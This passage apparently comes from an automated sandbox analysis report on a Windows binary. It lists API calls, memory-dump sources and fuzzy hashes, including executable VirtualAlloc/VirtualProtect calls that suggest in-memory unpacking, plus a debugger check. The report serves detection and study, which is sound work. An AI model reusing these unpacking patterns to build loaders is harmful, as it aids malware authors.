                					_t10 = _t25 + 2; // 0x2
                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                				}
                				return _v8;
                			}









                APIs
                • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,02FA937C,?,001D581A,004F0053,02FA937C,?,?,?,?,?,?,001D8522), ref: 001D8FF0
                • lstrlenW.KERNEL32(001D581A,?,001D581A,004F0053,02FA937C,?,?,?,?,?,?,001D8522), ref: 001D8FF7
                  • Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C
                • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,001D581A,004F0053,02FA937C,?,?,?,?,?,?,001D8522), ref: 001D9017
                • memcpy.NTDLL(74B069A0,001D581A,00000002,00000000,004F0053,74B069A0,?,?,001D581A,004F0053,02FA937C), ref: 001D902A
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: lstrlenmemcpy$AllocateHeap
                • String ID:
                • API String ID: 2411391700-0
                • Opcode ID: bacf907779707be1f004e9ba52bb002e6fdefcc2d3b1d8b77bb00a748dcea7da
                • Instruction ID: f673984a7d46867447753d552d80295cb5569e3304fa31ec0de5330f6e22979b
                • Opcode Fuzzy Hash: bacf907779707be1f004e9ba52bb002e6fdefcc2d3b1d8b77bb00a748dcea7da
                • Instruction Fuzzy Hash: 54F03736901119BB8F11AFA8DC85C8F7BACEF192947018463F90497202E731EE108BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(02FA9918,00000000,00000000,7742C740,001D2B1B,00000000), ref: 001D8017
                • lstrlen.KERNEL32(?), ref: 001D801F
                  • Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C
                • lstrcpy.KERNEL32(00000000,02FA9918), ref: 001D8033
                • lstrcat.KERNEL32(00000000,?), ref: 001D803E
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                • String ID:
                • API String ID: 74227042-0
                • Opcode ID: 9e799e77a48f14aac896e115932d5c1bf4c5c519cc91bf54a34e6f13920f789f
                • Instruction ID: 79eecf98bedc0115b8928cb57cf5804f1a5c01cddb6e3c78e5a6d7b08d2811d1
                • Opcode Fuzzy Hash: 9e799e77a48f14aac896e115932d5c1bf4c5c519cc91bf54a34e6f13920f789f
                • Instruction Fuzzy Hash: 91E01277503621AB87115BE8AC48C6BBBADFF997517044857F600D3220C7259805CBE1
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                APIs
                • VirtualAlloc.KERNELBASE(00000000,000007D1,00003000,00000040,000007D1,6E2B51C8), ref: 6E2B582D
                • VirtualAlloc.KERNEL32(00000000,00000059,00003000,00000040,6E2B5229), ref: 6E2B5864
                • VirtualAlloc.KERNEL32(00000000,00016DD9,00003000,00000040), ref: 6E2B58C4
                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2B58FA
                • VirtualProtect.KERNEL32(6E240000,00000000,00000004,6E2B574F), ref: 6E2B59FF
                • VirtualProtect.KERNEL32(6E240000,00001000,00000004,6E2B574F), ref: 6E2B5A26
                • VirtualProtect.KERNEL32(00000000,?,00000002,6E2B574F), ref: 6E2B5AF3
                • VirtualProtect.KERNEL32(00000000,?,00000002,6E2B574F,?), ref: 6E2B5B49
                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2B5B65
                Memory Dump Source
                • Source File: 00000003.00000002.479222451.000000006E2B5000.00000040.00020000.sdmp, Offset: 6E2B5000, based on PE: false
                Similarity
                • API ID: Virtual$Protect$Alloc$Free
                • String ID:
                • API String ID: 2574235972-0
                • Opcode ID: 25725fe3ea5edefb74e8182b314af060065adca4d4aa0626c8a3a422ebf314a2
                • Instruction ID: 6c745d1252552f361657073bcf2cc6166a8526736039d4674cf52b66e0d2632a
                • Opcode Fuzzy Hash: 25725fe3ea5edefb74e8182b314af060065adca4d4aa0626c8a3a422ebf314a2
                • Instruction Fuzzy Hash: 24D1BBB21446019FEB25CF44C8C0F51B7B7FF58318B096198ED8D9F65ADB70A820CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualProtectEx.KERNELBASE(000000FF,6E2CB428,0000311C,00000040,6E2C9B0C), ref: 6E278058
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 75b9d9ea45c702e07089079525561a67c6f51e6cf4e01e87130c30df609aa9e9
                • Instruction ID: a1e582854bca625b96c46d89573d95dd9aa2b686df78d7d56fd599bbbd57d549
                • Opcode Fuzzy Hash: 75b9d9ea45c702e07089079525561a67c6f51e6cf4e01e87130c30df609aa9e9
                • Instruction Fuzzy Hash: 8681EF70D08918DBCF18CF6DC99CA25BBA3BF4A30C3048A2AE64987345D6F4A484CF74
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6E28173D,?), ref: 6E281BC6
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: CreateHeap
                • String ID:
                • API String ID: 10892065-0
                • Opcode ID: 483b2f35660c5bdd1962abfe5b0416df88a4bd157d6527bbd394ccbcaad989ab
                • Instruction ID: 979237c94ca83251f38fa3d8fdcc203498a54548063c7a51e60539beca9bf256
                • Opcode Fuzzy Hash: 483b2f35660c5bdd1962abfe5b0416df88a4bd157d6527bbd394ccbcaad989ab
                • Instruction Fuzzy Hash: 66D02E32950B085ADB004EB2A80CB623BDDC386BA6F004832B90CC6080F6B0C084CA10
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __encode_pointer.LIBCMT ref: 6E2830B4
                  • Part of subcall function 6E283040: RtlEncodePointer.NTDLL(00000000,?,6E2830B9,00000000,6E286D8F,6E2CB748,00000000,00000314,?,6E282D8E,6E2CB748,6E2AF8D0,00012010), ref: 6E2830A7
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: EncodePointer__encode_pointer
                • String ID:
                • API String ID: 4150071819-0
                • Opcode ID: eb08a0bf7b6e8c3d7dc2c6ad7d3a54e248f4a5f833920566f578a1624b4a0c82
                • Instruction ID: f72adfadcf089c0e06255bea16268a7781b1895133ffda6bd4711a94e519fdd4
                • Opcode Fuzzy Hash: eb08a0bf7b6e8c3d7dc2c6ad7d3a54e248f4a5f833920566f578a1624b4a0c82
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 6E2856C7
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E2856DC
                • UnhandledExceptionFilter.KERNEL32(6E2AFA48), ref: 6E2856E7
                • GetCurrentProcess.KERNEL32(C0000409), ref: 6E285703
                • TerminateProcess.KERNEL32(00000000), ref: 6E28570A
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID:
                • API String ID: 2579439406-0
                • Opcode ID: 788efda50812f887afd7825c6a3145e86c3dd754309af492bc074fc826170125
                • Instruction ID: 526dc63793b17d5a37da057f743e3237281c9d7fc359027ad85e1321952faa65
                • Opcode Fuzzy Hash: 788efda50812f887afd7825c6a3145e86c3dd754309af492bc074fc826170125
                • Instruction Fuzzy Hash: 2C2116B8900A08DFCF81CF68C94C6457BB6FB0AB06F50481AEA0A8738CE7B45585CF75
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: _strncmp
                • String ID:
                • API String ID: 909875538-0
                • Opcode ID: c444bfdbbaf6dd546ba66a4cabcb92db74929d0173adcdc962e52be3aa016cb8
                • Instruction ID: aef3cef9f04ad0ae90455034eb7005d4b5b2cd982321898dfad2d7607ca95451
                • Opcode Fuzzy Hash: c444bfdbbaf6dd546ba66a4cabcb92db74929d0173adcdc962e52be3aa016cb8
                • Instruction Fuzzy Hash: 9D41E9ABB4651933F2605BC9AD02F8BA6176BF0756F048422EB44DA2C4F334D82DC7E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __CreateFrameInfo.LIBCMT ref: 6E284BF3
                  • Part of subcall function 6E281407: __getptd.LIBCMT ref: 6E281415
                  • Part of subcall function 6E281407: __getptd.LIBCMT ref: 6E281423
                • __getptd.LIBCMT ref: 6E284BFD
                  • Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
                  • Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317
                • __getptd.LIBCMT ref: 6E284C0B
                • __getptd.LIBCMT ref: 6E284C19
                • __getptd.LIBCMT ref: 6E284C24
                • _CallCatchBlock2.LIBCMT ref: 6E284C4A
                  • Part of subcall function 6E2814AC: __CallSettingFrame@12.LIBCMT ref: 6E2814F8
                  • Part of subcall function 6E284CF1: __getptd.LIBCMT ref: 6E284D00
                  • Part of subcall function 6E284CF1: __getptd.LIBCMT ref: 6E284D0E
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                • String ID:
                • API String ID: 1602911419-0
                • Opcode ID: 2b5c4b26aa238ef2731b7681a9c10d53cc21645a98bdbbf697043bcf6117ff31
                • Instruction ID: 0eeec9ef972102bf9326ffb8020914b492c23d94844a8e1d1290eaa553f34b8c
                • Opcode Fuzzy Hash: 2b5c4b26aa238ef2731b7681a9c10d53cc21645a98bdbbf697043bcf6117ff31
                • Instruction Fuzzy Hash: 6E11D7B5C0024DDFDB00DFE4C448AEEBBBAFF14318F108969E854A7290DB389A599F54
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __getptd.LIBCMT ref: 6E28388C
                  • Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
                  • Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317
                • __amsg_exit.LIBCMT ref: 6E2838AC
                • __lock.LIBCMT ref: 6E2838BC
                • InterlockedDecrement.KERNEL32(?), ref: 6E2838D9
                • InterlockedIncrement.KERNEL32(6E2B3DA8), ref: 6E283904
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                • String ID:
                • API String ID: 4271482742-0
                • Opcode ID: 7233a2e988d8b053c84c03886333f9d2590991cbf694fddaebd58eccf5d2205b
                • Instruction ID: c099af2b697f64037b011b46a701f204f3e646c18dcbfd5dc47e02c4ec9f2e00
                • Opcode Fuzzy Hash: 7233a2e988d8b053c84c03886333f9d2590991cbf694fddaebd58eccf5d2205b
                • Instruction Fuzzy Hash: 82018435A01A2FABDB519BE5840DB8F7767BF01729F104405D824A76C0CB74698DCBE1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __lock.LIBCMT ref: 6E280175
                  • Part of subcall function 6E281B7E: __mtinitlocknum.LIBCMT ref: 6E281B94
                  • Part of subcall function 6E281B7E: __amsg_exit.LIBCMT ref: 6E281BA0
                  • Part of subcall function 6E281B7E: RtlEnterCriticalSection.NTDLL(?), ref: 6E281BA8
                • ___sbh_find_block.LIBCMT ref: 6E280180
                • ___sbh_free_block.LIBCMT ref: 6E28018F
                • HeapFree.KERNEL32(00000000,?,6E2B1A28,0000000C,6E281B5F,00000000,6E2B1AF8,0000000C,6E281B99,?,?,?,6E287A94,00000004,6E2B1E48,0000000C), ref: 6E2801BF
                • GetLastError.KERNEL32(?,6E287A94,00000004,6E2B1E48,0000000C,6E2858CA,?,?,00000000,00000000,00000000,?,6E2832B9,00000001,00000214), ref: 6E2801D0
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                • String ID:
                • API String ID: 2714421763-0
                • Opcode ID: 43b6cb95d3a342972afe3f806825d3c765e6bb06c5465f6990c725fcb3ef5791
                • Instruction ID: 48100bff18a6f937f6a66da222a3e7c6ac3e52cedfd87f83b3d3c8026edd1db1
                • Opcode Fuzzy Hash: 43b6cb95d3a342972afe3f806825d3c765e6bb06c5465f6990c725fcb3ef5791
                • Instruction Fuzzy Hash: E1018F3581661AABEB205BF19808F8F377AAF01766F240908E855661C0EB34958CCA65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: _realloc
                • String ID:
                • API String ID: 1750794848-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: _realloc
                • String ID:
                • API String ID: 1750794848-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _malloc.LIBCMT ref: 6E28159F
                  • Part of subcall function 6E280234: __FF_MSGBANNER.LIBCMT ref: 6E280257
                  • Part of subcall function 6E280234: __NMSG_WRITE.LIBCMT ref: 6E28025E
                • std::bad_alloc::bad_alloc.LIBCMT ref: 6E2815C2
                  • Part of subcall function 6E28151B: std::exception::exception.LIBCMT ref: 6E281527
                • std::bad_exception::bad_exception.LIBCMT ref: 6E2815D6
                • __CxxThrowException@8.LIBCMT ref: 6E2815E4
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                • String ID:
                • API String ID: 1802512180-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __getptd.LIBCMT ref: 6E283FF8
                  • Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
                  • Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317
                • __getptd.LIBCMT ref: 6E28400F
                • __amsg_exit.LIBCMT ref: 6E28401D
                • __lock.LIBCMT ref: 6E28402D
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                • String ID:
                • API String ID: 3521780317-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __getptd.LIBCMT ref: 6E284D00
                  • Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
                  • Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317
                • __getptd.LIBCMT ref: 6E284D0E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.479085698.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: csm
                • API String ID: 803148776-1018135373
                Uniqueness

                Uniqueness Score: -1.00%